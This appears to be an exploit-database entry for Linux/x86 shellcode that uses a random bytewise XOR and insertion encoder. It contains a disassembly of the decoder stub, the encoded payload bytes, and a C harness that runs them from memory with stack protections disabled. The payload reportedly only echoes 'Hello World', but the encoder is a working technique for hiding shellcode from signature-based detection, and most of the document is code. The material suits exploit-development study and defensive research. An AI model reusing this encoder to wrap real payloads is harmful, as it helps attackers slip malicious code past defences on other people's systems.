Linux/x86 - echo "Hello World" + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)



EKU-ID: 7978 CVE: OSVDB-ID:
Author: Ray Doyle Published: 2018-09-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
*/
 
/****************************************************
Disassembly of section .text:
 
08048060 <_start>:
 8048060:   eb 2f                   jmp    8048091 <find_address>
 
08048062 <decoder>:
 8048062:   5f                      pop    edi
 8048063:   57                      push   edi
 8048064:   5e                      pop    esi
 
08048065 <get_key>:
 8048065:   8a 07                   mov    al,BYTE PTR [edi]
 8048067:   6a 90                   push   0xffffff90
 8048069:   5b                      pop    ebx
 804806a:   3c aa                   cmp    al,0xaa
 804806c:   74 0a                   je     8048078 <decode_insertion>
 804806e:   30 d8                   xor    al,bl
 
08048070 <decode_xor>:
 8048070:   30 07                   xor    BYTE PTR [edi],al
 8048072:   47                      inc    edi
 8048073:   30 07                   xor    BYTE PTR [edi],al
 8048075:   47                      inc    edi
 8048076:   eb ed                   jmp    8048065 <get_key>
 
08048078 <decode_insertion>:
 8048078:   8d 3e                   lea    edi,[esi]
 804807a:   31 c0                   xor    eax,eax
 804807c:   31 db                   xor    ebx,ebx
 
0804807e <insertion_decoder>:
 804807e:   8a 1c 06                mov    bl,BYTE PTR [esi+eax*1]
 8048081:   80 f3 90                xor    bl,0x90
 8048084:   75 10                   jne    8048096 <encoded>
 8048086:   8a 5c 06 01             mov    bl,BYTE PTR [esi+eax*1+0x1]
 804808a:   88 1f                   mov    BYTE PTR [edi],bl
 804808c:   47                      inc    edi
 804808d:   04 02                   add    al,0x2
 804808f:   eb ed                   jmp    804807e <insertion_decoder>
 
08048091 <find_address>:
 8048091:   e8 cc ff ff ff          call   8048062 <decoder>
 
08048096 <encoded>:
 8048096:   b7 cc                   mov    bh,0xcc
 8048098:   3d ba 0a ab f3          cmp    eax,0xf3ab0aba
 804809d:   a3 9b bb 01 95          mov    ds:0x9501bb9b,eax
 80480a2:   75 d4                   jne    8048078 <decode_insertion>
 80480a4:   bc f7 fa d9 1c          mov    esp,0x1cd9faf7
 80480a9:   8d                      (bad) 
 80480aa:   d5 1c                   aad    0x1c
 80480ac:   f7 56 73                not    DWORD PTR [esi+0x73]
 80480af:   31 ef                   xor    edi,ebp
 80480b1:   cd a9                   int    0xa9
 80480b3:   34 12                   xor    al,0x12
 80480b5:   4f                      dec    edi
 80480b6:   50                      push   eax
 80480b7:   40                      inc    eax
 80480b8:   71 d0                   jno    804808a <insertion_decoder+0xc>
 80480ba:   94                      xchg   esp,eax
 80480bb:   c4                      (bad) 
 80480bc:   f7 d7                   not    edi
 80480be:   7f ee                   jg     80480ae <encoded+0x18>
 80480c0:   62                      (bad) 
 80480c1:   c3                      ret   
 80480c2:   48                      dec    eax
 80480c3:   03 d3                   add    edx,ebx
 80480c5:   8e 76 66                mov    ?,WORD PTR [esi+0x66]
 80480c8:   2c 54                   sub    al,0x54
 80480ca:   0c 78                   or     al,0x78
 80480cc:   05 6a 37 58 e4          add    eax,0xe458376a
 80480d1:   8b dc                   mov    ebx,esp
 80480d3:   04 3b                   add    al,0x3b
 80480d5:   ce                      into  
 80480d6:   b6 4a                   mov    dh,0x4a
 80480d8:   af                      scas   eax,DWORD PTR es:[edi]
 80480d9:   53                      push   ebx
 80480da:   59                      pop    ecx
 80480db:   a6                      cmps   BYTE PTR ds:[esi],BYTE PTR es:[edi]
 80480dc:   b5 05                   mov    ch,0x5
 80480de:   f7 30                   div    DWORD PTR [eax]
 80480e0:   15 ea eb 09 9c          adc    eax,0x9c09ebea
 80480e5:   60                      pusha 
 80480e6:   e4 10                   in     al,0x10
 80480e8:   7d cc                   jge    80480b6 <encoded+0x20>
 80480ea:   56                      push   esi
 80480eb:   cc                      int3  
 80480ec:   aa                      stos   BYTE PTR es:[edi],al
****************************************************/
 
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
 
unsigned char stub[] = \
"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";
 
unsigned char shellcode[] = \
"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";
 
unsigned char* code;
 
main()
{
    printf("\nStub Length: %d\n", strlen(stub));
    printf("Shellcode Length: %d\n\n", strlen(shellcode));
 
    printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode));
 
    code = malloc(strlen(stub) + strlen(shellcode));
    memcpy(code, stub, strlen(stub));
    memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));
 
    int (*ret)() = (int(*)())code;
 
    ret();
}